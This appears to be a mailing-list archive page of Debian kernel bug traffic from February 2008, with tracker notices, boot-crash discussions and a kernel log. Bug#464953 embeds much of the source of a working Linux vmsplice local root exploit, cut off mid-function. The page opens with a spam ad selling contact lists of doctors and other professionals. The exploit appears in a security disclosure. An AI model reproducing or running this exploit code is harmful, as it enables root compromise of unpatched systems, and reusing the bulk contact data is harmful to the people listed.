MD Listing

2008-02-12 Thread Faith A Lancaster



Here's what we're offering for this week:

Currently in Practice:  MDs in the USA 

788,435 in total * 17,845 emails

Lots of MDs in specialties like Orthopedics, Surgery, Radiology, Dermatology, 
Neurology, General Practice etc..

Can easily be sorted by 16 different fields


US Pharmaceutical Company Executives Contact List
47,000 names and emails of the major positions

Hospitals in the United States
Full data for all the major positions in more than 7k facilities

US Dentist Listing
A complete Listing or dentists and related services (valued at $399)

Chiropractors in the USA
100k Chiropractors offices with full contact data including email, postal 
address, phone and fax


Now priced at: 
$391 for all lists above

Email us at:  [EMAIL PROTECTED]

  

good until Feb 15




=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Scanned with Copfilter Version 0.83beta3a (ProxSMTP 1.4)
AntiSpam:  SpamAssassin 3.1.4
AntiVirus: ClamAV 0.88.4/4020 - Tue Aug 21 15:46:02 2007
by Markus Madlener @ http://www.copfilter.org

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Scanned with Copfilter Version 0.83beta3a (ProxSMTP 1.4)
AntiVirus: ClamAV 0.88.4/4020 - Tue Aug 21 15:46:02 2007
by Markus Madlener @ http://www.copfilter.org


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 393332 is important

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 severity 393332 important
Bug#393332: linux-image-2.6.18-1-686 requires modern yaird
Severity set to `important' from `normal'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: forcibly merging 403171 393332

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 forcemerge 403171 393332
Bug#403171: linux-image-2.6.18-3-686: Please update yaird Depends version to = 
0.0.12-15
Bug#393332: linux-image-2.6.18-1-686 requires modern yaird
Forcibly Merged 393332 403171.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: reassign 389441 to yaird

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 reassign 389441 yaird
Bug#389441: installation of image package fails with yaird 0.0.12-14
Bug reassigned from package `linux-2.6' to `yaird'.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 403171

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 tags 403171 + pending
Bug#403171: linux-image-2.6.18-3-686: Please update yaird Depends version to = 
0.0.12-15
There were no tags set.
Bug#393332: linux-image-2.6.18-1-686 requires modern yaird
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processing of linux-2.6_2.6.22-6.lenny1_i386.changes

2008-02-12 Thread Archive Administrator
linux-2.6_2.6.22-6.lenny1_i386.changes uploaded successfully to localhost
along with the files:
  linux-2.6_2.6.22-6.lenny1.dsc
  linux-2.6_2.6.22.orig.tar.gz
  linux-2.6_2.6.22-6.lenny1.diff.gz
  linux-doc-2.6.22_2.6.22-6.lenny1_all.deb
  linux-manual-2.6.22_2.6.22-6.lenny1_all.deb
  linux-patch-debian-2.6.22_2.6.22-6.lenny1_all.deb
  linux-source-2.6.22_2.6.22-6.lenny1_all.deb
  linux-support-2.6.22-3_2.6.22-6.lenny1_all.deb
  linux-tree-2.6.22_2.6.22-6.lenny1_all.deb
  linux-headers-2.6.22-3-all_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-all-i386_2.6.22-6.lenny1_i386.deb
  linux-libc-dev_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-486_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-686_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-k7_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-686-bigmem_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-amd64_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-vserver_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-vserver-686_2.6.22-6.lenny1_i386.deb
  linux-image-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb
  linux-headers-2.6.22-3-vserver-k7_2.6.22-6.lenny1_i386.deb

Greetings,

Your Debian queue daemon


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Joey Hess
maximilian attems wrote:
 on shiny fujitsu p700 lifebook, with a Crusoe processor.

FWIW, I misremembered the model number. It's a not-so-shiny P2110.

-- 
see shy jo


signature.asc
Description: Digital signature


Bug#464945: closed by Bastian Blank [EMAIL PROTECTED] (Bug#464945: fixed in linux-2.6 2.6.24-4)

2008-02-12 Thread Amir Tabatabaei
Hi Bastian,

On Mon, 2008-02-11 at 17:00 +0300, Vitaliy Okulov wrote:
 When 2.6.18-6 kernel image will be updated?

when will you patch 2.6.18 in stable as this is much more important than
the one in unstable? (although my own desktop is secure for the
moment :-) )

Regards,
Amir




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464953: marked as done (linux-2.6: mmap() local root exploit)

2008-02-12 Thread Debian Bug Tracking System

Your message dated Mon, 11 Feb 2008 13:02:15 +
with message-id [EMAIL PROTECTED]
and subject line Bug#464945: fixed in linux-2.6 2.6.24-4
has caused the Debian Bug report #464945,
regarding linux-2.6: mmap() local root exploit
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464945: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464945
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: linux-2.6
Version: 2.6.22-3-generic
Severity: critical
Tags: security
Justification: root security hole

There is a security hole in all versions of linux-2.6 distributed by
Debian, including Etch's kernel.

The attached exploit code can be used to test if a kernel is vulnerable,
it starts a root shell.

-- System Information:
Debian Release: lenny/sid
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-generic (SMP w/8 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

*** proof-of-concept.c
/*
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 */

#define _GNU_SOURCE
#include stdio.h
#include errno.h
#include stdlib.h
#include string.h
#include malloc.h
#include limits.h
#include signal.h
#include unistd.h
#include sys/uio.h
#include sys/mman.h
#include asm/page.h
#define __KERNEL__
#include asm/unistd.h

#define PIPE_BUFFERS16
#define PG_compound 14
#define uintunsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)(x + sizeof(x) - 40)

struct page {
unsigned long flags;
int count;
int mapcount;
unsigned long private;
void *mapping;
unsigned long index;
struct { long next, prev; } lru;
};

voidexit_code();
charexit_stack[1024 * 1024];

voiddie(char *msg, int err)
{
printf(err ? [-] %s: %s\n : [-] %s\n, msg, strerror(err));
fflush(stdout);
fflush(stderr);
exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   316
#endif

#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
movl %0, 0x10(%%esp) ;
movl %1, 0x0c(%%esp) ;
movl %2, 0x08(%%esp) ;
movl %3, 0x04(%%esp) ;
movl %4, 0x00(%%esp) ;
iret
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movl %%esp, %%eax ;
andl %1, %%eax ;
movl (%%eax), %0
: =r (curr)
: i (~8191)
);
return (void *) curr;
}

#elif defined (__x86_64__)

#ifndef __NR_vmsplice
#define __NR_vmsplice   278
#endif

#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246

static_inline
voidexit_kernel()
{
__asm__ __volatile__ (
swapgs ;
movq %0, 0x20(%%rsp) ;
movq %1, 0x18(%%rsp) ;
movq %2, 0x10(%%rsp) ;
movq %3, 0x08(%%rsp) ;
movq %4, 0x00(%%rsp) ;
iretq
: : i (USER_SS), r (STACK(exit_stack)), i (USER_FL),
i (USER_CS), r (exit_code)
);
}

static_inline
void *  get_current()
{
unsigned long curr;
__asm__ __volatile__ (
movq %%gs:(0), %0
: =r (curr)
);
return (void *) curr;
}

#else
#error unsupported arch
#endif

#if defined (_syscall4)
#define __NR__vmsplice  __NR_vmsplice
_syscall4(
long, _vmsplice,
int, fd,
struct iovec *, iov,
unsigned long, nr_segs,
unsigned int, flags)

#else
#define _vmsplice(fd,io,nr,fl)  syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif

static uint uid, gid;

voidkernel_code()
{
int i;
uint*p = get_current();

for (i = 0; i  1024-13; i++) {
if (p[0] == uid  p[1] == uid 
p[2] == uid  p[3] == uid 
p[4] == gid  p[5] == gid 
p[6] == gid  p[7] == gid) {
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
p = (uint *) ((char *)(p + 8) + sizeof(void *));
p[0] = p[1] = p[2] = ~0;
break;
}
p++;
}   

exit_kernel();
}

voidexit_code()
{
if (getuid() != 0)
 

Processed: bug 463785 is forwarded to http://madwifi.org/ticket/1774

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 forwarded 463785 http://madwifi.org/ticket/1774
Bug#463785: linux-image-2.6.24-1-686: ath5k doesn't associate
Forwarded-to-address changed from http://madwifi.org/ticket/1774 to 
http://madwifi.org/ticket/1774.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: bug 463785 is forwarded to http://madwifi.org/ticket/1774

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.13
 forwarded 463785 http://madwifi.org/ticket/1774
Bug#463785: linux-image-2.6.24-1-686: ath5k doesn't associate
Noted your statement that Bug has been forwarded to 
http://madwifi.org/ticket/1774.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 12:32:27PM -0800, H. Peter Anvin wrote:
 
 INT 6 is #UD, undefined instruction.
 
 If you could send me a copy of your vmlinux file (not bzImage), it would 
 speed things up.

cp -l src/linux-2.6-2.6.24/debian/build/build_i386_none_686/vmlinux 
~/public_html/

http://charm.itp.tuwien.ac.at/~mattems/
 
 I happen to have an old TM5800-based machine sitting around, so I can 
 probably reproduce it.
 
   -hpa

cool



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: tagging 465512

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.9.26
 tags 465512 + pending
Bug#465512: linux-image-2.6.18-6-amd64: broken symlink 
/lib/modules/2.6.18-6-amd64/source
There were no tags set.
Tags added: pending


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: merging 463716 464910

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.16
 merge 463716 464910
Bug#463716: linux-image-2.6.24-1-686: hwclock fails without --directisa
Bug#464910: hwclock doesn't work with this kernel
Merged 463716 464910.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464919: Fails to boot (reboots after BIOS data check)

2008-02-12 Thread Jacek Politowski
On Tue, Feb 12, 2008 at 01:57:22AM +0100, maximilian attems wrote:
On Sat, 09 Feb 2008, Jacek Politowski wrote:

 Package: linux-image-2.6.24-1-686
 Version: 2.6.24-3
 Severity: important

 Machine reboots right after booting - after the dots and BIOS data
 check successful., before Uncompressing kernel.

try to manualy rerun lilo, does that help?

It helped, thanks.

Probably, the bug can be closed now, if it was only a glitch on my
system, not something with the package in general.
(next time I'll try running LILO before reporting)

-- 
Jacek Politowski



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#388453: via driver fails to handle interrupt

2008-02-12 Thread Vincent Zweije
On Mon, Feb 11, 2008 at 11:21:46PM +0100, maximilian attems wrote:

||  On Wed, 06 Feb 2008, Vincent Zweije wrote:

||   Reportbug asked for 2.6.24-2 but I didn't see that on
||   packages.debian.org, so this is for 2.6.24-1.
||
||  thanks for the quick feedback!
||
||  did you try booting with the bootparam irqpoll?
||  via boxes are missing upstream specs, thus..

Startup log attached.

Irqpoll is not fun for daily operations: the system becomes far too slow.

Furthermore a cdrom window (sound juicer) keeps popping up now, and hdc
failures are being spewed all over the place. I suspect the via interrupt
is now being interpreted as a spurious hdc interrupt or something.

||  you may want to sign and propagate
||  http://www.petitiononline.com/vialinux/

Sounds good on principle, though the actual effect would seem dubitable.

Ciao.Vincent.
-- 
Vincent Zweije [EMAIL PROTECTED]| If you're flamed in a group you
http://www.xs4all.nl/~zweije/  | don't read, does anybody get burnt?
[Xhost should be taken out and shot] |-- Paul Tomblin on a.s.r.
Feb 12 23:05:17 arrow syslogd 1.5.0#1.1: restart.
Feb 12 23:05:17 arrow kernel: klogd 1.5.0#1.1, log source = /proc/kmsg started.
Feb 12 23:05:17 arrow kernel: Initializing cgroup subsys cpuset
Feb 12 23:05:17 arrow kernel: Linux version 2.6.24-1-686 (Debian 2.6.24-2) 
([EMAIL PROTECTED]) (gcc version 4.1.3 20080114 (prerelease) (Debian 4.1.2-19)) 
#1 SMP Thu Jan 31 20:35:50 UTC 2008
Feb 12 23:05:17 arrow kernel: BIOS-provided physical RAM map:
Feb 12 23:05:17 arrow kernel:  BIOS-e820:  - 0009f800 
(usable)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: 0009f800 - 000a 
(reserved)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: 000f - 0010 
(reserved)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: 0010 - 1bff 
(usable)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: 1bff - 1bff3000 
(ACPI NVS)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: 1bff3000 - 1c00 
(ACPI data)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: fec0 - fec01000 
(reserved)
Feb 12 23:05:17 arrow kernel:  BIOS-e820: fee0 - fee01000 
(reserved)
Feb 12 23:05:17 arrow kernel:  BIOS-e820:  - 0001 
(reserved)
Feb 12 23:05:17 arrow kernel: 0MB HIGHMEM available.
Feb 12 23:05:17 arrow kernel: 447MB LOWMEM available.
Feb 12 23:05:17 arrow kernel: found SMP MP-table at 000f5a50
Feb 12 23:05:17 arrow kernel: Entering add_active_range(0, 0, 114672) 0 entries 
of 256 used
Feb 12 23:05:17 arrow kernel: Zone PFN ranges:
Feb 12 23:05:17 arrow kernel:   DMA 0 - 4096
Feb 12 23:05:17 arrow kernel:   Normal   4096 -   114672
Feb 12 23:05:17 arrow kernel:   HighMem114672 -   114672
Feb 12 23:05:17 arrow kernel: Movable zone start PFN for each node
Feb 12 23:05:17 arrow kernel: early_node_map[1] active PFN ranges
Feb 12 23:05:17 arrow kernel: 0:0 -   114672
Feb 12 23:05:17 arrow kernel: On node 0 totalpages: 114672
Feb 12 23:05:17 arrow kernel:   DMA zone: 32 pages used for memmap
Feb 12 23:05:17 arrow kernel:   DMA zone: 0 pages reserved
Feb 12 23:05:17 arrow kernel:   DMA zone: 4064 pages, LIFO batch:0
Feb 12 23:05:17 arrow kernel:   Normal zone: 863 pages used for memmap
Feb 12 23:05:17 arrow kernel:   Normal zone: 109713 pages, LIFO batch:31
Feb 12 23:05:17 arrow kernel:   HighMem zone: 0 pages used for memmap
Feb 12 23:05:17 arrow kernel:   Movable zone: 0 pages used for memmap
Feb 12 23:05:17 arrow kernel: DMI 2.3 present.
Feb 12 23:05:17 arrow kernel: ACPI: RSDP 000F76E0, 0014 (r0 VIAK8 )
Feb 12 23:05:17 arrow kernel: ACPI: RSDT 1BFF3000, 002C (r1 VIAK8  AWRDACPI 
42302E31 AWRD  1010101)
Feb 12 23:05:17 arrow kernel: ACPI: FACP 1BFF3040, 0074 (r1 VIAK8  AWRDACPI 
42302E31 AWRD  1010101)
Feb 12 23:05:17 arrow kernel: ACPI: DSDT 1BFF30C0, 45DC (r1 VIAK8  AWRDACPI 
1000 MSFT  10C)
Feb 12 23:05:17 arrow kernel: ACPI: FACS 1BFF, 0040
Feb 12 23:05:17 arrow kernel: ACPI: APIC 1BFF76C0, 005A (r1 VIAK8  AWRDACPI 
42302E31 AWRD  1010101)
Feb 12 23:05:17 arrow kernel: ACPI: PM-Timer IO Port: 0x4008
Feb 12 23:05:17 arrow kernel: ACPI: Local APIC address 0xfee0
Feb 12 23:05:17 arrow kernel: ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
Feb 12 23:05:17 arrow kernel: Processor #0 15:12 APIC version 16
Feb 12 23:05:17 arrow kernel: ACPI: LAPIC_NMI (acpi_id[0x00] dfl dfl lint[0x1])
Feb 12 23:05:17 arrow kernel: ACPI: IOAPIC (id[0x02] address[0xfec0] 
gsi_base[0])
Feb 12 23:05:17 arrow kernel: IOAPIC[0]: apic_id 2, version 3, address 
0xfec0, GSI 0-23
Feb 12 23:05:17 arrow kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 
dfl dfl)
Feb 12 23:05:17 arrow kernel: ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 
low level)
Feb 12 23:05:17 arrow kernel: ACPI: IRQ0 used by override.
Feb 12 23:05:17 arrow kernel: ACPI: IRQ2 

Bug#464919: marked as done (Fails to boot (reboots after BIOS data check))

2008-02-12 Thread Debian Bug Tracking System

Your message dated Tue, 12 Feb 2008 23:28:45 +0100
with message-id [EMAIL PROTECTED]
and subject line Re: Bug#464919: Fails to boot (reboots after BIOS data check)
has caused the Debian Bug report #464919,
regarding Fails to boot (reboots after BIOS data check)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
464919: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=464919
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: linux-image-2.6.24-1-686
Version: 2.6.24-3
Severity: important

Machine reboots right after booting - after the dots and BIOS data
check successful., before Uncompressing kernel.

It didn't occur in 2.6.24-2 and it doesn't occur in 2.6.22-3.

I'm running it on Intel Core2Duo E6600 on ASRock 775Dual-VSTA (VIA
chipset mainboard). I haven't changed CMOS settings or added any
hardware recently.



-- Package-specific info:

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=pl_PL, LC_CTYPE=pl_PL (charmap=ISO-8859-2)
Shell: /bin/sh linked to /bin/bash

Versions of packages linux-image-2.6.24-1-686 depends on:
ii  debconf [debconf-2.0]1.5.19  Debian configuration management sy
ii  initramfs-tools [linux-initr 0.91d   tools for generating an initramfs
ii  module-init-tools3.3-pre11-4 tools for managing Linux kernel mo

Versions of packages linux-image-2.6.24-1-686 recommends:
ii  libc6-i6862.7-6  GNU C Library: Shared libraries [i

-- debconf information:
  linux-image-2.6.24-1-686/preinst/overwriting-modules-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/bootloader-error-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/create-kimage-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/prerm/would-invalidate-boot-loader-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/initrd-2.6.24-1-686:
  linux-image-2.6.24-1-686/preinst/lilo-has-ramdisk:
  linux-image-2.6.24-1-686/preinst/abort-install-2.6.24-1-686:
  linux-image-2.6.24-1-686/prerm/removing-running-kernel-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/abort-overwrite-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/bootloader-test-error-2.6.24-1-686:
  linux-image-2.6.24-1-686/preinst/lilo-initrd-2.6.24-1-686: true
  shared/kernel-image/really-run-bootloader: true
  linux-image-2.6.24-1-686/postinst/old-system-map-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/preinst/failed-to-move-modules-2.6.24-1-686:
  linux-image-2.6.24-1-686/postinst/depmod-error-initrd-2.6.24-1-686: false
  linux-image-2.6.24-1-686/preinst/bootloader-initrd-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/old-initrd-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/old-dir-initrd-link-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/depmod-error-2.6.24-1-686: false
  linux-image-2.6.24-1-686/preinst/elilo-initrd-2.6.24-1-686: true
  linux-image-2.6.24-1-686/postinst/kimage-is-a-directory:


---End Message---
---BeginMessage---
On Tue, Feb 12, 2008 at 11:17:50PM +0100, Jacek Politowski wrote:
 On Tue, Feb 12, 2008 at 01:57:22AM +0100, maximilian attems wrote:
 On Sat, 09 Feb 2008, Jacek Politowski wrote:
 
  check successful., before Uncompressing kernel.
 
 try to manualy rerun lilo, does that help?
 
 It helped, thanks.

ok cool, thanks for feedback - closing.
 
 Probably, the bug can be closed now, if it was only a glitch on my
 system, not something with the package in general.
 (next time I'll try running LILO before reporting)

hmm searching a box with lilo, hmm zu none at hands at anymore,
be sure to have do_bootloader = yes in /etc/kernel-img.conf
and none of the grub hooks.

see man kernel-img.conf

---End Message---


redhat-cluster_2.20080212-1_amd64.changes ACCEPTED

2008-02-12 Thread Debian Installer

Accepted:
cman_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/cman_2.20080212-1_amd64.deb
gfs-tools_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/gfs-tools_2.20080212-1_amd64.deb
gfs2-tools_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/gfs2-tools_2.20080212-1_amd64.deb
gnbd-client_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/gnbd-client_2.20080212-1_amd64.deb
gnbd-server_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/gnbd-server_2.20080212-1_amd64.deb
libcman-dev_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/libcman-dev_2.20080212-1_amd64.deb
libcman2_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/libcman2_2.20080212-1_amd64.deb
libdlm-dev_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/libdlm-dev_2.20080212-1_amd64.deb
libdlm2_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/libdlm2_2.20080212-1_amd64.deb
redhat-cluster-source_2.20080212-1_all.deb
  to pool/main/r/redhat-cluster/redhat-cluster-source_2.20080212-1_all.deb
redhat-cluster-suite_2.20080212-1_all.deb
  to pool/main/r/redhat-cluster/redhat-cluster-suite_2.20080212-1_all.deb
redhat-cluster_2.20080212-1.diff.gz
  to pool/main/r/redhat-cluster/redhat-cluster_2.20080212-1.diff.gz
redhat-cluster_2.20080212-1.dsc
  to pool/main/r/redhat-cluster/redhat-cluster_2.20080212-1.dsc
redhat-cluster_2.20080212.orig.tar.gz
  to pool/main/r/redhat-cluster/redhat-cluster_2.20080212.orig.tar.gz
rgmanager_2.20080212-1_amd64.deb
  to pool/main/r/redhat-cluster/rgmanager_2.20080212-1_amd64.deb


Override entries for your package:
cman_2.20080212-1_amd64.deb - optional admin
gfs-tools_2.20080212-1_amd64.deb - optional admin
gfs2-tools_2.20080212-1_amd64.deb - optional admin
gnbd-client_2.20080212-1_amd64.deb - optional admin
gnbd-server_2.20080212-1_amd64.deb - optional admin
libcman-dev_2.20080212-1_amd64.deb - optional libdevel
libcman2_2.20080212-1_amd64.deb - optional libs
libdlm-dev_2.20080212-1_amd64.deb - optional libdevel
libdlm2_2.20080212-1_amd64.deb - optional libs
redhat-cluster-source_2.20080212-1_all.deb - optional admin
redhat-cluster-suite_2.20080212-1_all.deb - optional admin
redhat-cluster_2.20080212-1.dsc - source admin
rgmanager_2.20080212-1_amd64.deb - optional admin

Announcing to [EMAIL PROTECTED]


Thank you for your contribution to Debian.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: severity of 464962 is serious

2008-02-12 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.16
 severity 464962 serious
Bug#464962: immediate crash on boot on TM5800
Severity set to `serious' from `important'


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#465508: linux-image-2.6.24-1-686: Kernel freeze all system

2008-02-12 Thread maximilian attems
On Tue, Feb 12, 2008 at 09:46:32PM +0100, Rafael wrote:
 
 Using Debian Sid and linux-image-2.6.24-686:
 System is complete freeze when amsn application starts session.
 Amsn works well with previous linux images as like as 2.6.22-3-686.
 
 When system is freeze, I press Alt + Impr + b and kernel do not reboot.

not beeing an msn user, can you help to track that down.
is that really 100% reproducable or did it happen only once?

any syslog oops left when this happens?



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread Bastian Blank
On Tue, Feb 12, 2008 at 01:42:50PM -0800, H. Peter Anvin wrote:
 Okay, the faulting instruction is the following:
 c0383360:   0f 1f 40 00 nopl   0x0(%eax)

include/asm-x86/nops.h:
| /* P6 nops */
| /* uses eax dependencies (Intel-recommended choice) */
[...]
| #define P6_NOP4 .byte 0x0f,0x1f,0x40,0\n

Bastian

-- 
Leave bigotry in your quarters; there's no room for it on the bridge.
-- Kirk, Balance of Terror, stardate 1709.2



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#464962: immediate crash on boot on TM5800

2008-02-12 Thread H. Peter Anvin

Bastian Blank wrote:

On Tue, Feb 12, 2008 at 01:42:50PM -0800, H. Peter Anvin wrote:
The Crusoe code morphing software apparently doesn't recognize these 
long noops, and (presumably) the rest of the hinting NOOP group.  gcc 
didn't use to generate them, and Crusoe/Efficeon generally do not 
benefit from code alignment anyway.  I suspect the best thing to do is 
to use either a 586 kernel or build a dedicated Crusoe kernel without 
code alignment.


Crusoe is explicitely marked as 586 with TSC in the kernel config.



Yes, but the kernel in question wasn't compiled as a Crusoe kernel, but 
a generic 686 kernel.


-hpa



--
